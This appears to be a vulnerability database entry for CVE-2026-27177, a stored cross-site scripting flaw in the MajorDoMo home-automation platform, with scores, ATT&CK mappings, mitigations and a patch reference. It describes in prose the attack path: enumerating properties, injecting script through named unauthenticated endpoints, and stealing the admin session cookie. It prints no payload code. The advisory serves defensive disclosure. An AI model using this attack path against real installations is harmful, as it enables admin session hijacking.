Cyber Resilience

CVE-2026-27177

MediumPublic PoC

Published: 18 February 2026

Published
18 February 2026
Modified
20 February 2026
KEV Added
Patch
CVSS Score v4 5.3 CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS Score 0.0005 14.9th percentile
Risk Priority 11 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2026-27177 is a medium-severity Cross-site Scripting (CWE-79) vulnerability in Mjdm Majordomo. Its CVSS base score is 5.3 (Medium).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 14.9th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Deeper analysis

CVE-2026-27177 is a stored cross-site scripting (XSS) vulnerability in MajorDoMo (also known as Major Domestic Module), an open-source home automation and IoT management platform. The issue affects the unauthenticated /objects/?op=set endpoint, which is designed for IoT device integration and accepts user-supplied property values without sanitization, storing them raw in the database. When an administrator accesses the property editor in the admin panel, these values are rendered without escaping in a paragraph tag (SOURCE field) and a textarea element (VALUE field), triggering the XSS payload automatically on page load without user interaction. The vulnerability is rated 7.2 on the CVSS v3.1 scale (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) and maps to CWE-79.

Any unauthenticated attacker with network access can exploit this vulnerability by enumerating properties through the unauthenticated /api.php/data/ endpoint and injecting malicious JavaScript into any property via the /objects/?op=set endpoint. Upon an administrator viewing the affected property editor, the XSS executes in the admin's browser context, enabling theft of sensitive data. The session cookie lacks the HttpOnly flag, allowing attackers to exfiltrate it via document.cookie for full session hijacking, potentially granting unauthorized admin access to the MajorDoMo instance.

Advisories from VulnCheck and Chocapikk detail the vulnerability and proof-of-concept exploitation, while a patch addressing the sanitization and HttpOnly issues is available in GitHub pull request #1177 for the sergejey/majordomo repository.

EU & UK References

Vulnerability details

MajorDoMo (aka Major Domestic Module) contains a stored cross-site scripting (XSS) vulnerability via the /objects/?op=set endpoint, which is intentionally unauthenticated for IoT device integration. User-supplied property values are stored raw in the database without sanitization. When an administrator views the…

more

property editor in the admin panel, the stored values are rendered without escaping in both a paragraph tag (SOURCE field) and a textarea element (VALUE field). The XSS fires on page load without requiring any click from the admin. Additionally, the session cookie lacks the HttpOnly flag, enabling session hijack via document.cookie exfiltration. An attacker can enumerate properties via the unauthenticated /api.php/data/ endpoint and poison any property with malicious JavaScript.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1185 Browser Session Hijacking Collection
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Why these techniques?

Stored XSS in unauthenticated public endpoint enables T1190 (exploit of internet-facing app for initial access) and directly facilitates T1185 (browser session hijacking via cookie theft in admin context).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2026-27178Same product: Mjdm Majordomo
CVE-2026-27174Same product: Mjdm Majordomo
CVE-2026-27181Same product: Mjdm Majordomo
CVE-2026-27180Same product: Mjdm Majordomo
CVE-2026-27175Same product: Mjdm Majordomo
CVE-2026-27179Same product: Mjdm Majordomo
CVE-2026-1843Shared CWE-79
CVE-2026-42678Shared CWE-79
CVE-2023-49186Shared CWE-79
CVE-2025-22586Shared CWE-79

Affected Assets

mjdm
majordomo
all versions

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Requires validation and sanitization of all input received at the unauthenticated /objects/?op=set endpoint before values are stored in the database.

prevent

Mandates output filtering/escaping of stored property values when rendered in the admin panel's SOURCE paragraph and VALUE textarea, directly blocking XSS execution.

prevent

Enforces secure configuration settings such as the HttpOnly flag on session cookies, preventing exfiltration via document.cookie after XSS fires.

References